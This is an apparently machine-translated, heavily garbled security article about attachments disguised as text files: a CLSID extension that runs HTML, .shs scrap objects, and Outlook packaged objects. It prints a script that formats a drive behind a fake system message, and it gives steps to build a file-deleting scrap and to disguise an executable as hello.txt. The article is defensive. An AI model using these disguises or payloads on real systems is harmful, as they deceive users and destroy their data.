Weak current College】 【TXT text also dangerous.

<br> If you receive an email attachment with a look like this: QQ broadcasting. txt, you think it must be a plain text file I want to tell you, not necessarily! it the actual file name can be either QQ broadcasting. txt .{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}. {3050F4D8-98B5-11CF-BB82-00AA00BDCE0B} in the registry is relevancy in the HTML file. But save the file as the file name when it doesn't appear that you see .is a. txt file, this file is actually equivalent to QQ broadcasting. txt.html. then open this file directly, why risk it? please see if the contents of this file are as follows: <br> <script> <br .> a = newActiveXObject ("WSCript.Shell"); <br> a.run ("format.comd: / q / autotest / u"); <br> alert ("Windowsisconfiguringthesystem.Pleasedonotinterruptthisprocess .");< br> < .; / script> <br> You may think that it will call the Notepad to run, but if you double-click it, it is called HTML to run in the background and automatically begin formatting the drive d, and display the "Windows is .configuring the system. Plase do not interrupt this process. "Such a dialog box to deceive you. You can open the attachment in. txt dangerous big enough? <br> <br> Spoof principle: when you double-click the camouflaged. Txt ., because the real file name extension is. {3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}, which is the. html file, so they will run in the form of html files, this is it can be up and running. <br .> <br> File content in the 2nd and 3rd row is its ability to produce damaging effects. One of the third line is the destruction of the performer, where you can add a command with the nature of the damage. Then line 2 what again .? you may have noticed in row 2, "" Wscript! is it directed the whole screen, it is the mastermind behind the scenes! <br> <br> Full name of the owner, Wscript Windowsscripting is new in Win98 added functionality, is .a batch language / automate tool - it's corresponding program "Wscript.exe" is one of the scripting language interpreter, is located in c: \ WINDOWS, it makes the script can be executed as a batch executes. Masters in Windowsscripting scripting environment, pre .-defined number of objects, it comes with several built-in objects, you can implement access environment variables, create shortcuts, loader, read and write to the registry, and other functions. <br> <br> A recognition and prevention methods: .<br> <br> ① the spoofed. txt files displayed is not a text file of the icon, it displays the file type is not defined, this is a sign of distinction between it and the normal TXT file. <br> <br .> ② recognition of another way is to press the "mode" when you view a Web page in the "my computer" on the left side will show the file name, you can see it is not a true TXT file. The problem is that .many veteran Starter experience is not enough, or because no attention and turn it on, once again remind you, that you receive a message that the file name of the attachment, not only displayed extension, also note the actual display of the icon. < .br> <br> ③ for attachment to others appear to be TXT file, it can be downloaded with the right mouse button, choose "open with Notepad", this will be safe. <br> <br> 2 malicious fragmented files <br .> <br> Another terrible TXT files are in Windows is called "debris object" (extension to "shs"), it generally is disguised as text files via e-mail attachment to dissemination, for example, like this: QQ number broadcasting. .Txt.shs, truly a suffix of "sh" are not displayed, if the file contains such as "format" command will be terrible! plus, following four reasons is the cause of a certain dangers: <br> <br> ① debris .object files and the default icon is a Notepad file icon similar icons, can easily be mistaken for is some text in the document, the user it is not enough price-fixers prepared. <br> <br> ② in Windows's default state, " .fragment object "file extension (". shs ") is hidden, even if you are in the" Explorer "→" Tools "→" folder options "→" view ", the" Hide extensions for known file types "front" √ " .remove, "." or hidden hush, this is because Windows supports double extension, such as "QQ number broadcasting. txt.shs" displayed name will always be a ". txt" QQ number broadcasting. <br> <br> ③ even .if there is any suspicion that you use anti-virus software will not find the file in question, because the file itself is not a virus, nor is it an executable and system files. Do you wonder if such a file? <br> < .br> ④ the hush attachment virus manufacture very easily, 5 minutes to learn, does not require programming knowledge (formatted C disk command: "formatc:" everyone knows it. <br> <br> 1, the specific instance <br> < .br> So, what exactly to fragment object the user's computer will cause any threats? let's make a test will understand. Following the test environment are in Windows2000 Server Edition. We first create a test file test.txt (I create location D: \ .test.txt), and then let's make one able to delete the test file in the object file. <br> <br> ① first run an Object Packager (packager.exe), my Win2000 service providers installed on/winnt/system32. .<br> <br> ② create a new file, open the menu "file" → "import", will pop up a file dialog box, which lets you select a file. Regardless, just select a file. <br> <br .> ③ and then open the "Edit" → "command line" from the command line input dialog box, enter "cmd.exe / cdeld: \ test.txt" and click OK. <br> <br> ④ and then, in .the menu select "Edit" → "replication packets." <br> <br> ⑤ Next, feel free to find a place on your hard disk, I directly on your desktop. On the desktop, click the right mouse button in the pop .-up menu, choose "Paste", then we can see the desktop creates an object file fragmentation. <br> <br> Now we can double-click on this file, the CMD window Flash, and then to drive d, the test .file D: \ test.txt has been deleted! now you should know that the object to a command entered in the package is executed. A good risk, if this command is to remove the system an important file, or the format command to format .a command, such as the risk that the how terrible! <br> <br> Let's take a look at the "invisible killer" real face! <br> <br> 2. technical principle <br> <br> According to Microsoft ., sh file is a special kind of object linking and embedding (object linking and embedding, object linking and embedding) object that can be represented by words or create excellent spreadsheet. By selecting the text in the document or image of a region, and then .drag and drop it somewhere on the desktop, you can create a Windows object, or debris is called sh file (this file is not readable files). But you can use any other name of the file you want to rename the sh file, or .drag and drop the hush object into another document (in the same way, you can cut and paste). <br> <br> In other words, we have entered a command as an object linking and embedding objects embedded into the Object Packager new .files, but Microsoft can easily be embedded into the file objects for replication, using a technical shell scrap object (SH), that is, when you copy objects between different files, Windows is an object wrapper into a fragment object to be replicated. Therefore ., once we are not to copy and paste the file, but directly paste the scrap object to your hard disk, create one. Sh file. This fragment object file saved the original object has features that the original object that contains the command will be parsed ., this is exactly what its terrible this Department! <br> <br> 3. preventive methods <br> <br> (1) the "barbaric" method <br> <br> Sh file since it is not an executable file, .of course, the need for additional procedures to resolve implementation, we remove the resolution executing simple association can prevent such file lurking threats. Run the registry editor, regedit.exe, primary key, HKEY_CLASSES_ROOT \. shs default ShellScrap deleted, now double-click .. Sh file, see, do not perform a? a dialog box pops up, let us choose open. Sh file needs program, in which you select the "Notepad" program is very safe. A little more thorough approach is the open under the .HKEY_CLASSES_ROOT \ ShellScrap \ shell \ open \ command. Sh file association fully removed, now double-click. Sh file, even the choice of running the program dialog box does not appear, it will require rebuilding file associations in the control panel. <br .> <br> (2) the "civilized" method <br> <br> ① HEY_CLASSES_ROOT \ ShellScrap key in the registry editor, a key value "NeverShowExt", it is the result ". Hush" file extension cannot be displayed. Delete .this key, you can see ". Hush" extension. <br> <br> ② replace "debris object" file's default icon. As a result of debris object files default icons and text file icons are very similar and easy to paralysis, so .we have to change its icon. Open Explorer and select "view" menu under "folder" check box pops up the dialog box, choose the "file types" tab, in the "registered file types" found under "debris object." Click .the "Edit" button, open the "edit file types" dialog box, click the top edge of the "change icon" button. Open C: \ WINDOWS \ SYSTEM \ Pifmgr.dll, choose from one of the icons appear as ". .Hush "file of the new icon. <br> <br> (3) additional prevention measures <br> <br> ① If virus file hiding its true extension" hush, "and you're in the anti-virus software is set .to scan the specified program file, instead of scanning all files (such as only scan executable files), then the antivirus software is unable to find a virus, anti-virus software to add the specified program file ". Hush" files to scan. .Various settings of the antivirus software, are relatively simple, we set ourselves. <br> <br> ② the prohibition "debris object" file and "shortcut to point to the document" file. <br> <br> Three variations of mail .attachments <br> <br> In addition to the above two categories of dangerous "TXT" files, there is another dangerous "TXT" files - transformed view message attachments! - a look is the TXT file is actually a EXE file! I spoke .to for example OutLook2000 simplified Chinese version. <br> <br> 1. open the OutLook2000, create a new message, select the menu bar of the "format" → "rich text" in the message body, click the left mouse button, .select the menu "insert" → "object", click on the "create from file" → "browser", select the Windows directory of notepad.exe, click on "OK" in the main part of the new messages appear notepad.exe .and its icon. <br> <br> 2. in the incipient notepad.exe and click the right mouse button on the icon, select "edit package", open the Object Packager, choose "insert icon" button, select the "Browse ."and select the icon for the current WINDOWS \ SYSTEM \ SHELL32.DLL box, select the one you want to select an icon, for example a text file of the icon, and then press the" OK ". Then select the menu" Edit ."→" label ", as defined a name, for example hello.txt, click on OK. <br> <br> 3. exit the Object Packager, you are prompted to select the update. <br> <br> 4. .OK, now to appear in front of hello.txt, most people will think it is a text file attachment to the core, I believe that no one suspected that it was something else. Please double-click the chart to see what will happen is .not discovered it opened is notepad.exe! if it was a virus file, you can imagine! <br> <br> In fact, when you receive such a message OutLook2000, it displays a message with attachments, when you think it is a .text file when you double-click to open the attachment, Outlook prompts: some objects contain viruses that may cause harm to your computer, so make sure that the object is the source available *. believing the sense of security when it comes to embedded object .? strong people usually choose "no" (that's right), General who may choose (you're not good!). <br> <br> Identification: fear not, though it's deceptively greatly, but will still be exposed to some of .the bag: <br> <br> 1. it is in fact an object linking and embedding objects and not as an attachment, choose it, the selection box is different from the selection box to select attachments. Point the right mouse button and a .menu. <br> <br> 2. double-click to open it, safety tips and accessories-safety tips, this point is very important. At this point, you should choose "no", and then click the right mouse button, .select "edit package", you are prompted to trust the object selection "is" in Object Packager content box on the right side of the buttocks. In this case, it will display the "backup" NOTEPAD.EXE, whether the file is executable ., the key here. <br> <br> 3. because it is not an attachment, choose "file" → "save attachments" is no dialog box appears. <br> <br> 4. because not all mail software support object .embedded, so this kind of mail in a format not definite recognition by some software, such as OutLookExpress. However, in view of the wide use of face, especially in larger, have their own mail server, or it is necessary to remind everyone to .watch an embedded object, not only is the vision, in fact, elite, and other support embedded objects embedded object software allows tailoring to confuse people. <br> <br> <br> <br> <br> <br> <br .> <br>.